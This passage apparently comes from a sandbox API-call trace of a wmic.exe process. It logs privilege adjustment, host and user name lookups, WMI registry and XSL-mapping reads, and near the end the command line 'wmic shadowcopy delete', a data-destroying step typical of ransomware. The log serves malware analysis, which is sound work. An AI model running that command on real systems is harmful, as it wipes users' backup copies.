Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0077.961] free (_Block=0x182788) [0077.961] CloseHandle (hObject=0x108) returned 1 [0077.961] malloc (_Size=0x40) returned 0x182788 [0077.961] malloc (_Size=0x40) returned 0x1827d0 [0077.961] malloc (_Size=0x40) returned 0x182818 [0077.962] malloc (_Size=0x20a) returned 0x182860 [0077.962] GetSystemDirectoryW (in: lpBuffer=0x182860, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.962] free (_Block=0x182860) [0077.963] malloc (_Size=0xc) returned 0x183fb8 [0077.963] malloc (_Size=0xc) returned 0x183fd0 [0077.963] malloc (_Size=0xc) returned 0x182860 [0077.963] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0077.963] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0077.963] free (_Block=0x183fb8) [0077.963] free (_Block=0x183fd0) [0077.963] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x76d30000 [0077.964] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0077.964] SetThreadUILanguage (LangId=0x0) returned 0x409 [0077.965] FreeLibrary (hLibModule=0x76d30000) returned 1 [0077.965] free (_Block=0x182860) [0077.965] _vsnwprintf (in: _Buffer=0x182818, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x1cfd10 | out: _Buffer="ms_409") returned 6 [0077.965] malloc (_Size=0x20) returned 0x183fb8 [0077.965] GetComputerNameW (in: lpBuffer=0x183fb8, nSize=0x1cfd68 | out: lpBuffer="XDUWTFONO", nSize=0x1cfd68) returned 1 [0077.966] lstrlenW (lpString="XDUWTFONO") returned 9 [0077.966] malloc (_Size=0x14) returned 0x182860 [0077.966] lstrlenW (lpString="XDUWTFONO") returned 9 [0077.966] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x1cfda4 | out: lpNameBuffer=0x0, nSize=0x1cfda4) returned 0x0 [0077.968] GetLastError () returned 0xea [0077.968] malloc (_Size=0x40) returned 0x182880 [0077.968] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x182880, nSize=0x1cfda4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cfda4) returned 0x1 [0077.968] lstrlenW (lpString="") returned 0 [0077.968] lstrlenW (lpString="XDUWTFONO") returned 9 [0077.968] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0077.971] lstrlenW (lpString=".") returned 1 [0077.971] lstrlenW (lpString="XDUWTFONO") returned 9 [0077.971] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0077.971] lstrlenW (lpString="LOCALHOST") returned 9 [0077.971] lstrlenW (lpString="XDUWTFONO") returned 9 [0077.971] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0077.971] lstrlenW (lpString="XDUWTFONO") returned 9 [0077.971] lstrlenW (lpString="XDUWTFONO") returned 9 [0077.971] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0077.971] free (_Block=0x182860) [0077.971] lstrlenW (lpString="XDUWTFONO") returned 9 [0077.971] malloc (_Size=0x14) returned 0x182860 [0077.971] lstrlenW (lpString="XDUWTFONO") returned 9 [0077.971] lstrlenW (lpString="XDUWTFONO") returned 9 [0077.971] malloc (_Size=0x14) returned 0x1828c8 [0077.971] lstrlenW (lpString="XDUWTFONO") returned 9 [0077.971] malloc (_Size=0x4) returned 0x1828e8 [0077.971] malloc (_Size=0xc) returned 0x1828f8 [0077.971] malloc (_Size=0x18) returned 0x182910 [0077.972] malloc (_Size=0xc) returned 0x182930 [0077.972] SysStringLen (param_1="IDENTIFY") returned 0x8 [0077.972] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0077.972] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0077.972] SysStringLen (param_1="IDENTIFY") returned 0x8 [0077.972] malloc (_Size=0x18) returned 0x182948 [0077.972] malloc (_Size=0xc) returned 0x182968 [0077.972] SysStringLen (param_1="IMPERSONATE") returned 0xb [0077.972] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0077.972] SysStringLen (param_1="IMPERSONATE") returned 0xb [0077.972] SysStringLen (param_1="IDENTIFY") returned 0x8 [0077.972] SysStringLen (param_1="IDENTIFY") returned 0x8 [0077.972] SysStringLen (param_1="IMPERSONATE") returned 0xb [0077.972] malloc (_Size=0x18) returned 0x182980 [0077.972] malloc (_Size=0xc) returned 0x1829a0 [0077.972] SysStringLen (param_1="DELEGATE") returned 0x8 [0077.972] SysStringLen (param_1="IDENTIFY") returned 0x8 [0077.972] SysStringLen (param_1="DELEGATE") returned 0x8 [0077.972] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0077.972] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0077.973] SysStringLen (param_1="DELEGATE") returned 0x8 [0077.973] malloc (_Size=0x18) returned 0x1829b8 [0077.973] malloc (_Size=0xc) returned 0x1829d8 [0077.973] malloc (_Size=0x18) returned 0x1829f0 [0077.973] malloc (_Size=0xc) returned 0x182a10 [0077.973] SysStringLen (param_1="NONE") returned 0x4 [0077.973] SysStringLen (param_1="DEFAULT") returned 0x7 [0077.973] SysStringLen (param_1="DEFAULT") returned 0x7 [0077.973] SysStringLen (param_1="NONE") returned 0x4 [0077.973] malloc (_Size=0x18) returned 0x182a28 [0077.973] malloc (_Size=0xc) returned 0x182a48 [0077.975] SysStringLen (param_1="CONNECT") returned 0x7 [0077.975] SysStringLen (param_1="DEFAULT") returned 0x7 [0077.975] malloc (_Size=0x18) returned 0x182a60 [0077.975] malloc (_Size=0xc) returned 0x182a80 [0077.975] SysStringLen (param_1="CALL") returned 0x4 [0077.975] SysStringLen (param_1="DEFAULT") returned 0x7 [0077.975] SysStringLen (param_1="CALL") returned 0x4 [0077.975] SysStringLen (param_1="CONNECT") returned 0x7 [0077.975] malloc (_Size=0x18) returned 0x18e868 [0077.975] malloc (_Size=0xc) returned 0x182e98 [0077.975] SysStringLen (param_1="PKT") returned 0x3 [0077.975] SysStringLen (param_1="DEFAULT") returned 0x7 [0077.975] SysStringLen (param_1="PKT") returned 0x3 [0077.975] SysStringLen (param_1="NONE") returned 0x4 [0077.975] SysStringLen (param_1="NONE") returned 0x4 [0077.975] SysStringLen (param_1="PKT") returned 0x3 [0077.975] malloc (_Size=0x18) returned 0x18e888 [0077.975] malloc (_Size=0xc) returned 0x182eb0 [0077.976] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0077.976] SysStringLen (param_1="DEFAULT") returned 0x7 [0077.976] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0077.976] SysStringLen (param_1="NONE") returned 0x4 [0077.976] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0077.976] SysStringLen (param_1="PKT") returned 0x3 [0077.976] SysStringLen (param_1="PKT") returned 0x3 [0077.976] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0077.976] malloc (_Size=0x18) returned 0x18e8a8 [0077.976] malloc (_Size=0xc) returned 0x182ec8 [0077.976] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0077.976] SysStringLen (param_1="DEFAULT") returned 0x7 [0077.976] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0077.976] SysStringLen (param_1="PKT") returned 0x3 [0077.976] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0077.976] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0077.976] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0077.976] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0077.976] malloc (_Size=0x18) returned 0x18e8c8 [0077.976] malloc (_Size=0x40) returned 0x182ee0 [0077.976] malloc (_Size=0x20a) returned 0x182f28 [0077.976] GetSystemDirectoryW (in: lpBuffer=0x182f28, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0077.977] free (_Block=0x182f28) [0077.977] malloc (_Size=0xc) returned 0x182f28 [0077.977] malloc (_Size=0xc) returned 0x182f40 [0077.977] malloc (_Size=0xc) returned 0x182f58 [0077.977] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0077.977] SysStringLen (param_1="\\wbem\\") returned 0x6 [0077.977] free (_Block=0x182f28) [0077.977] free (_Block=0x182f40) [0077.977] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0077.977] free (_Block=0x182f58) [0077.977] malloc (_Size=0xc) returned 0x182f28 [0077.977] malloc (_Size=0xc) returned 0x182f40 [0077.977] malloc (_Size=0xc) returned 0x182f58 [0077.977] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0077.977] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0077.978] free (_Block=0x182f28) [0077.978] free (_Block=0x182f40) [0077.978] GetCurrentThreadId () returned 0x864 [0077.978] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x1cf8c0 | out: phkResult=0x1cf8c0*=0x10c) returned 0x0 [0077.978] RegQueryValueExW (in: hKey=0x10c, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x1cf8cc, lpcbData=0x1cf8c8*=0x400 | out: lpType=0x0, lpData=0x1cf8cc*=0x30, lpcbData=0x1cf8c8*=0x4) returned 0x0 [0077.978] _wcsicmp (_String1="0", _String2="1") returned -1 [0077.978] _wcsicmp (_String1="0", _String2="2") returned -2 [0077.978] RegQueryValueExW (in: hKey=0x10c, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1cf8c8*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x1cf8c8*=0x42) returned 0x0 [0077.978] malloc (_Size=0x86) returned 0x182f70 [0077.978] RegQueryValueExW (in: hKey=0x10c, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x182f70, lpcbData=0x1cf8c8*=0x42 | out: lpType=0x0, lpData=0x182f70*=0x25, lpcbData=0x1cf8c8*=0x42) returned 0x0 [0077.978] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0077.978] malloc (_Size=0x42) returned 0x183000 [0077.979] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0077.979] RegQueryValueExW (in: hKey=0x10c, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x1cf8cc, lpcbData=0x1cf8c8*=0x400 | out: lpType=0x0, lpData=0x1cf8cc*=0x36, lpcbData=0x1cf8c8*=0xc) returned 0x0 [0077.979] _wtol (_String="65536") returned 65536 [0077.979] free (_Block=0x182f70) [0077.979] RegCloseKey (hKey=0x0) returned 0x6 [0077.979] CoCreateInstance (in: rclsid=0xa96d40*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa96d20*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x1cfd5c | out: ppv=0x1cfd5c*=0x234630) returned 0x0 [0084.029] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x234630, xmlSource=0x1cfce0*(varType=0x8, wReserved1=0xffff, wReserved2=0x387a, wReserved3=0x77c7, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x1cfd44 | out: isSuccessful=0x1cfd44*=0xffff) returned 0x0 [0094.902] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x234630, DOMElement=0x1cfd58 | out: DOMElement=0x1cfd58) returned 0x0 [0094.902] malloc (_Size=0xc) returned 0x182f28 [0094.903] free (_Block=0x182f28) [0094.904] malloc (_Size=0xc) returned 0x182f28 [0094.904] free (_Block=0x182f28) [0094.904] malloc (_Size=0xc) returned 0x182f28 [0094.904] malloc (_Size=0xc) returned 0x182f40 [0094.904] malloc (_Size=0x18) returned 0x18e8e8 [0094.905] malloc (_Size=0xc) returned 0x183160 [0094.905] free (_Block=0x183160) [0094.905] malloc (_Size=0xc) returned 0x183160 [0094.906] malloc (_Size=0xc) returned 0x183178 [0094.906] SysStringLen (param_1="VALUE") returned 0x5 [0094.906] SysStringLen (param_1="TABLE") returned 0x5 [0094.906] SysStringLen (param_1="TABLE") returned 0x5 [0094.906] SysStringLen (param_1="VALUE") returned 0x5 [0094.906] malloc (_Size=0x18) returned 0x18e908 [0094.906] malloc (_Size=0xc) returned 0x183190 [0094.907] free (_Block=0x183190) [0094.907] malloc (_Size=0xc) returned 0x18fac8 [0094.907] malloc (_Size=0xc) returned 0x18fae0 [0094.907] SysStringLen (param_1="LIST") returned 0x4 [0094.907] SysStringLen (param_1="TABLE") returned 0x5 [0094.907] malloc (_Size=0x18) returned 0x18e928 [0094.908] malloc (_Size=0xc) returned 0x18faf8 [0094.908] free (_Block=0x18faf8) [0094.908] malloc (_Size=0xc) returned 0x18faf8 [0094.908] malloc (_Size=0xc) returned 0x18fb10 [0094.909] SysStringLen (param_1="RAWXML") returned 0x6 [0094.909] SysStringLen (param_1="TABLE") returned 0x5 [0094.909] SysStringLen (param_1="RAWXML") returned 0x6 [0094.909] SysStringLen (param_1="LIST") returned 0x4 [0094.909] SysStringLen (param_1="LIST") returned 0x4 [0094.909] SysStringLen (param_1="RAWXML") returned 0x6 [0094.909] malloc (_Size=0x18) returned 0x18e948 [0094.910] malloc (_Size=0xc) returned 0x18fb28 [0094.910] free (_Block=0x18fb28) [0094.910] malloc (_Size=0xc) returned 0x18fb28 [0094.910] malloc (_Size=0xc) returned 0x18fb40 [0094.910] SysStringLen (param_1="HTABLE") returned 0x6 [0094.910] SysStringLen (param_1="TABLE") returned 0x5 [0094.910] SysStringLen (param_1="HTABLE") returned 0x6 [0094.910] SysStringLen (param_1="LIST") returned 0x4 [0094.910] malloc (_Size=0x18) returned 0x18e968 [0094.911] malloc (_Size=0xc) returned 0x18fb58 [0094.911] free (_Block=0x18fb58) [0094.911] malloc (_Size=0xc) returned 0x18fb58 [0094.912] malloc (_Size=0xc) returned 0x18fb70 [0094.912] SysStringLen (param_1="HFORM") returned 0x5 [0094.912] SysStringLen (param_1="TABLE") returned 0x5 [0094.912] SysStringLen (param_1="HFORM") returned 0x5 [0094.912] SysStringLen (param_1="LIST") returned 0x4 [0094.912] SysStringLen (param_1="HFORM") returned 0x5 [0094.912] SysStringLen (param_1="HTABLE") returned 0x6 [0094.912] malloc (_Size=0x18) returned 0x18e988 [0094.913] malloc (_Size=0xc) returned 0x18fb88 [0094.913] free (_Block=0x18fb88) [0094.913] malloc (_Size=0xc) returned 0x18fb88 [0094.913] malloc (_Size=0xc) returned 0x18fba0 [0094.914] SysStringLen (param_1="XML") returned 0x3 [0094.914] SysStringLen (param_1="TABLE") returned 0x5 [0094.914] SysStringLen (param_1="XML") returned 0x3 [0094.914] SysStringLen (param_1="VALUE") returned 0x5 [0094.914] SysStringLen (param_1="VALUE") returned 0x5 [0094.914] SysStringLen (param_1="XML") returned 0x3 [0094.914] malloc (_Size=0x18) returned 0x18e9a8 [0094.914] malloc (_Size=0xc) returned 0x18fbb8 [0094.915] free (_Block=0x18fbb8) [0094.915] malloc (_Size=0xc) returned 0x18fbb8 [0094.915] malloc (_Size=0xc) returned 0x18fbd0 [0094.915] SysStringLen (param_1="MOF") returned 0x3 [0094.915] SysStringLen (param_1="TABLE") returned 0x5 [0094.915] SysStringLen (param_1="MOF") returned 0x3 [0094.915] SysStringLen (param_1="LIST") returned 0x4 [0094.915] SysStringLen (param_1="MOF") returned 0x3 [0094.915] SysStringLen (param_1="RAWXML") returned 0x6 [0094.915] SysStringLen (param_1="LIST") returned 0x4 [0094.915] SysStringLen (param_1="MOF") returned 0x3 [0094.915] malloc (_Size=0x18) returned 0x18e9c8 [0094.916] malloc (_Size=0xc) returned 0x18fbe8 [0094.916] free (_Block=0x18fbe8) [0094.916] malloc (_Size=0xc) returned 0x18fbe8 [0094.916] malloc (_Size=0xc) returned 0x18fc00 [0094.917] SysStringLen (param_1="CSV") returned 0x3 [0094.917] SysStringLen (param_1="TABLE") returned 0x5 [0094.917] SysStringLen (param_1="CSV") returned 0x3 [0094.917] SysStringLen (param_1="LIST") returned 0x4 [0094.917] SysStringLen (param_1="CSV") returned 0x3 [0094.917] SysStringLen (param_1="HTABLE") returned 0x6 [0094.917] SysStringLen (param_1="CSV") returned 0x3 [0094.917] SysStringLen (param_1="HFORM") returned 0x5 [0094.917] malloc (_Size=0x18) returned 0x18e9e8 [0094.918] malloc (_Size=0xc) returned 0x18fc18 [0094.918] free (_Block=0x18fc18) [0094.918] malloc (_Size=0xc) returned 0x18fc18 [0094.918] malloc (_Size=0xc) returned 0x18fc30 [0094.918] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0094.918] SysStringLen (param_1="TABLE") returned 0x5 [0094.918] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0094.918] SysStringLen (param_1="VALUE") returned 0x5 [0094.919] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0094.919] SysStringLen (param_1="XML") returned 0x3 [0094.919] SysStringLen (param_1="XML") returned 0x3 [0094.919] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0094.919] malloc (_Size=0x18) returned 0x18ea08 [0094.919] malloc (_Size=0xc) returned 0x18fc48 [0094.920] free (_Block=0x18fc48) [0094.920] malloc (_Size=0xc) returned 0x18fc48 [0094.920] malloc (_Size=0xc) returned 0x18fc60 [0094.920] SysStringLen (param_1="texttablewsys") returned 0xd [0094.920] SysStringLen (param_1="TABLE") returned 0x5 [0094.920] SysStringLen (param_1="texttablewsys") returned 0xd [0094.920] SysStringLen (param_1="XML") returned 0x3 [0094.920] SysStringLen (param_1="texttablewsys") returned 0xd [0094.920] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0094.920] SysStringLen (param_1="XML") returned 0x3 [0094.920] SysStringLen (param_1="texttablewsys") returned 0xd [0094.920] malloc (_Size=0x18) returned 0x18ea28 [0094.921] malloc (_Size=0xc) returned 0x18fc78 [0094.922] free (_Block=0x18fc78) [0094.922] malloc (_Size=0xc) returned 0x18fc78 [0094.922] malloc (_Size=0xc) returned 0x18fc90 [0094.922] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0094.922] SysStringLen (param_1="TABLE") returned 0x5 [0094.922] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0094.922] SysStringLen (param_1="XML") returned 0x3 [0094.922] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0094.922] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0094.922] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0094.922] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0094.922] malloc (_Size=0x18) returned 0x18ea48 [0094.923] malloc (_Size=0xc) returned 0x18fca8 [0094.923] free (_Block=0x18fca8) [0094.924] malloc (_Size=0xc) returned 0x18fca8 [0094.924] malloc (_Size=0xc) returned 0x18fcc0 [0094.924] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0094.924] SysStringLen (param_1="TABLE") returned 0x5 [0094.924] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0094.924] SysStringLen (param_1="XML") returned 0x3 [0094.924] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0094.924] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0094.924] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0094.924] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0094.924] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0094.924] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0094.924] malloc (_Size=0x18) returned 0x18ea68 [0094.925] malloc (_Size=0xc) returned 0x18fcd8 [0094.925] free (_Block=0x18fcd8) [0094.925] malloc (_Size=0xc) returned 0x18fcd8 [0094.925] malloc (_Size=0xc) returned 0x18fcf0 [0094.926] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0094.926] SysStringLen (param_1="TABLE") returned 0x5 [0094.926] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0094.926] SysStringLen (param_1="XML") returned 0x3 [0094.926] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0094.926] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0094.926] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0094.926] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0094.926] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0094.926] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0094.926] malloc (_Size=0x18) returned 0x18ea88 [0094.927] malloc (_Size=0xc) returned 0x18fd08 [0094.927] free (_Block=0x18fd08) [0094.927] malloc (_Size=0xc) returned 0x18fd08 [0094.927] malloc (_Size=0xc) returned 0x18fd20 [0094.927] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0094.927] SysStringLen (param_1="TABLE") returned 0x5 [0094.928] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0094.928] SysStringLen (param_1="XML") returned 0x3 [0094.928] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0094.928] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0094.928] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0094.928] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0094.928] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0094.928] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0094.928] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0094.928] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0094.928] malloc (_Size=0x18) returned 0x18eaa8 [0095.077] malloc (_Size=0xc) returned 0x18fd38 [0095.077] free (_Block=0x18fd38) [0095.077] malloc (_Size=0xc) returned 0x18fd38 [0095.077] malloc (_Size=0xc) returned 0x18fd50 [0095.078] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0095.078] SysStringLen (param_1="TABLE") returned 0x5 [0095.078] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0095.078] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0095.078] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0095.078] SysStringLen (param_1="XML") returned 0x3 [0095.078] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0095.078] SysStringLen (param_1="texttablewsys") returned 0xd [0095.078] SysStringLen (param_1="XML") returned 0x3 [0095.078] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0095.078] malloc (_Size=0x18) returned 0x18eac8 [0095.079] malloc (_Size=0xc) returned 0x18fd68 [0095.079] free (_Block=0x18fd68) [0095.079] malloc (_Size=0xc) returned 0x18fd68 [0095.079] malloc (_Size=0xc) returned 0x18fd80 [0095.079] SysStringLen (param_1="htable-sortby") returned 0xd [0095.080] SysStringLen (param_1="TABLE") returned 0x5 [0095.080] SysStringLen (param_1="htable-sortby") returned 0xd [0095.080] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0095.080] SysStringLen (param_1="htable-sortby") returned 0xd [0095.080] SysStringLen (param_1="XML") returned 0x3 [0095.080] SysStringLen (param_1="htable-sortby") returned 0xd [0095.080] SysStringLen (param_1="texttablewsys") returned 0xd [0095.080] SysStringLen (param_1="htable-sortby") returned 0xd [0095.080] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0095.080] SysStringLen (param_1="XML") returned 0x3 [0095.080] SysStringLen (param_1="htable-sortby") returned 0xd [0095.080] malloc (_Size=0x18) returned 0x18eae8 [0095.081] malloc (_Size=0xc) returned 0x18fd98 [0095.081] free (_Block=0x18fd98) [0095.081] malloc (_Size=0xc) returned 0x18fd98 [0095.081] malloc (_Size=0xc) returned 0x18fdb0 [0095.082] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0095.082] SysStringLen (param_1="TABLE") returned 0x5 [0095.082] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0095.082] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0095.082] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0095.082] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0095.082] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0095.082] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0095.082] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0095.082] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0095.082] malloc (_Size=0x18) returned 0x18eb08 [0095.083] malloc (_Size=0xc) returned 0x18fdc8 [0095.083] free (_Block=0x18fdc8) [0095.083] malloc (_Size=0xc) returned 0x18fdc8 [0095.083] malloc (_Size=0xc) returned 0x18fde0 [0095.083] SysStringLen (param_1="wmiclimofformat") returned 0xf [0095.083] SysStringLen (param_1="TABLE") returned 0x5 [0095.083] SysStringLen (param_1="wmiclimofformat") returned 0xf [0095.083] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0095.083] SysStringLen (param_1="wmiclimofformat") returned 0xf [0095.084] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0095.084] SysStringLen (param_1="wmiclimofformat") returned 0xf [0095.084] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0095.084] SysStringLen (param_1="wmiclimofformat") returned 0xf [0095.084] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0095.084] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0095.084] SysStringLen (param_1="wmiclimofformat") returned 0xf [0095.084] malloc (_Size=0x18) returned 0x18eb28 [0095.085] malloc (_Size=0xc) returned 0x18fdf8 [0095.085] free (_Block=0x18fdf8) [0095.085] malloc (_Size=0xc) returned 0x18fdf8 [0095.085] malloc (_Size=0xc) returned 0x18fe10 [0095.086] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0095.086] SysStringLen (param_1="TABLE") returned 0x5 [0095.086] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0095.086] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0095.086] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0095.086] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0095.086] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0095.086] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0095.086] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0095.086] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0095.086] malloc (_Size=0x18) returned 0x18eb48 [0095.087] malloc (_Size=0xc) returned 0x18fe28 [0095.087] free (_Block=0x18fe28) [0095.087] malloc (_Size=0xc) returned 0x18fe28 [0095.087] malloc (_Size=0xc) returned 0x18fe40 [0095.088] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0095.088] SysStringLen (param_1="TABLE") returned 0x5 [0095.088] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0095.088] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0095.088] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0095.088] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0095.088] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0095.088] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0095.088] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0095.088] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0095.088] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0095.088] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0095.088] malloc (_Size=0x18) returned 0x18eb68 [0095.089] FreeThreadedDOMDocument:IUnknown:Release (This=0x234630) returned 0x0 [0095.089] free (_Block=0x182f58) [0095.089] GetCommandLineW () returned="wmic shadowcopy delete" [0095.089] malloc (_Size=0x30) returned 0x183190 [0095.089] memcpy_s (in: _Destination=0x183190, _DestinationSize=0x2e, _Source=0x431976, _SourceSize=0x2e | 